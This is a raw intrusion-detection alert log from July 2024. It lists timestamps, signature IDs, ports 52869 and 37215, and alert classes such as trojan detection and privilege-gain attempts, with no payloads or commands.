                      Timestamp:07/20/24-23:01:42.477986
                      SID:2027339
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.250039
                      SID:2027339
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.623383
                      SID:2027339
                      Source Port:56122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.898615
                      SID:2025132
                      Source Port:47258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.313651
                      SID:2027339
                      Source Port:41252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:51332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.698072
                      SID:2025132
                      Source Port:45622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:35824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.416791
                      SID:2025132
                      Source Port:47972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.137101
                      SID:2831300
                      Source Port:60448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:52436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2027339
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2829579
                      Source Port:32866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.796252
                      SID:2027339
                      Source Port:45564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:52552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.380701
                      SID:2025132
                      Source Port:40426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.995202
                      SID:2027339
                      Source Port:60130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2835222
                      Source Port:46970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2027339
                      Source Port:39708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.663245
                      SID:2831300
                      Source Port:36028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2027339
                      Source Port:42806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.767377
                      SID:2831300
                      Source Port:60718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.766296
                      SID:2027339
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.644828
                      SID:2027339
                      Source Port:45610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662466
                      SID:2027339
                      Source Port:47294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.362240
                      SID:2025132
                      Source Port:59436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221338
                      SID:2829579
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2027339
                      Source Port:35692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249114
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.023857
                      SID:2831300
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650969
                      SID:2829579
                      Source Port:54752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.549051
                      SID:2027339
                      Source Port:42536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.932731
                      SID:2027339
                      Source Port:54026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.118060
                      SID:2027339
                      Source Port:49534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:49380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2025132
                      Source Port:51006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.928013
                      SID:2831300
                      Source Port:48608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.032025
                      SID:2027339
                      Source Port:53862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.227976
                      SID:2835222
                      Source Port:39874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.184321
                      SID:2829579
                      Source Port:46508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2027339
                      Source Port:58376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2025132
                      Source Port:34350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2829579
                      Source Port:51232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2027339
                      Source Port:55056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:37448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2831300
                      Source Port:37410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.707283
                      SID:2027339
                      Source Port:38118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.944699
                      SID:2027339
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.405308
                      SID:2025132
                      Source Port:47414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2027339
                      Source Port:35026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2025132
                      Source Port:54992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.704983
                      SID:2025132
                      Source Port:56436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2831300
                      Source Port:38452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.180811
                      SID:2025132
                      Source Port:40870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.994344
                      SID:2027339
                      Source Port:37924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.286177
                      SID:2831300
                      Source Port:59364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:55990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2835222
                      Source Port:45840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:54644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221802
                      SID:2835222
                      Source Port:43520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:48598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:36270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.102919
                      SID:2027339
                      Source Port:60570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.131973
                      SID:2025132
                      Source Port:39576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.701126
                      SID:2831300
                      Source Port:38500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2025132
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2831300
                      Source Port:52646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2835222
                      Source Port:60464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.269588
                      SID:2027339
                      Source Port:54980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.339110
                      SID:2831300
                      Source Port:35216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.994693
                      SID:2027339
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.917774
                      SID:2025132
                      Source Port:42596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2027339
                      Source Port:57992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.013772
                      SID:2027339
                      Source Port:41218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056707
                      SID:2025132
                      Source Port:42318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2027339
                      Source Port:38430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.177552
                      SID:2027339
                      Source Port:48212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.761962
                      SID:2025132
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2835222
                      Source Port:46354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2027339
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.118192
                      SID:2027339
                      Source Port:40918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.764338
                      SID:2831300
                      Source Port:53368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:57576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2831300
                      Source Port:42478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.142469
                      SID:2027339
                      Source Port:46094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263056
                      SID:2027339
                      Source Port:51596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:40554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2835222
                      Source Port:53734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667963
                      SID:2831300
                      Source Port:39612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.116897
                      SID:2027339
                      Source Port:47614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.088724
                      SID:2027339
                      Source Port:42460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:53720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.922614
                      SID:2025132
                      Source Port:44866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.702731
                      SID:2025132
                      Source Port:40134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.026968
                      SID:2027339
                      Source Port:36782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:44792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2025132
                      Source Port:42050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.047800
                      SID:2025132
                      Source Port:53322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.194629
                      SID:2027339
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.413068
                      SID:2831300
                      Source Port:48138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2027339
                      Source Port:44060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.496838
                      SID:2027339
                      Source Port:58716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:36080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.047922
                      SID:2831300
                      Source Port:60022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.144821
                      SID:2027339
                      Source Port:57366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2831300
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.663244
                      SID:2831300
                      Source Port:58542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2831300
                      Source Port:46866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:59578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:52098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.239090
                      SID:2027339
                      Source Port:41492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.561347
                      SID:2025132
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:37246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.484644
                      SID:2027339
                      Source Port:49704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:36418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.138638
                      SID:2025132
                      Source Port:44014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.209467
                      SID:2027339
                      Source Port:44154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.743968
                      SID:2027339
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.237113
                      SID:2027339
                      Source Port:51226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.874808
                      SID:2027339
                      Source Port:54348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.845732
                      SID:2027339
                      Source Port:36454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.104072
                      SID:2831300
                      Source Port:49432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2835222
                      Source Port:52630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660100
                      SID:2835222
                      Source Port:41958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.895849
                      SID:2027339
                      Source Port:51438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.717674
                      SID:2025132
                      Source Port:60566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.591350
                      SID:2027339
                      Source Port:42172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.014480
                      SID:2027339
                      Source Port:46038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633742
                      SID:2835222
                      Source Port:34184
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.143706
                      SID:2025132
                      Source Port:38728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.469737
                      SID:2027339
                      Source Port:54336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.474339
                      SID:2027339
                      Source Port:37058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817436
                      SID:2829579
                      Source Port:53206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.075905
                      SID:2025132
                      Source Port:54498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.307218
                      SID:2829579
                      Source Port:58444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2831300
                      Source Port:57508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.054775
                      SID:2831300
                      Source Port:50738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.351070
                      SID:2831300
                      Source Port:45256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.115715
                      SID:2027339
                      Source Port:60020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611773
                      SID:2027339
                      Source Port:39856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.440718
                      SID:2027339
                      Source Port:49428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.013771
                      SID:2027339
                      Source Port:49614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.054566
                      SID:2831300
                      Source Port:50458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.702517
                      SID:2027339
                      Source Port:33592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.659105
                      SID:2027339
                      Source Port:36324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:54286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.834296
                      SID:2831300
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2025132
                      Source Port:54748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.850156
                      SID:2831300
                      Source Port:35398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.245732
                      SID:2027339
                      Source Port:37204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2025132
                      Source Port:42700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.775041
                      SID:2831300
                      Source Port:48102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.358381
                      SID:2027339
                      Source Port:42794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147289
                      SID:2027339
                      Source Port:41806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221482
                      SID:2835222
                      Source Port:40150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.160906
                      SID:2025132
                      Source Port:60250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.966087
                      SID:2025132
                      Source Port:49634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.452218
                      SID:2027339
                      Source Port:52330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.393089
                      SID:2831300
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2831300
                      Source Port:56564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2835222
                      Source Port:43186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.937814
                      SID:2829579
                      Source Port:42512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2835222
                      Source Port:57256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:60584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.994693
                      SID:2027339
                      Source Port:53774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:42398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.001165
                      SID:2027339
                      Source Port:60444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263140
                      SID:2025132
                      Source Port:47540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.601975
                      SID:2025132
                      Source Port:47382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.905147
                      SID:2027339
                      Source Port:46932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:49188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.214887
                      SID:2027339
                      Source Port:44612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221280
                      SID:2835222
                      Source Port:43126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.015200
                      SID:2831300
                      Source Port:46412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.683789
                      SID:2831300
                      Source Port:34530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.099889
                      SID:2025132
                      Source Port:60370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.506914
                      SID:2027339
                      Source Port:36974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.277123
                      SID:2027339
                      Source Port:36376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
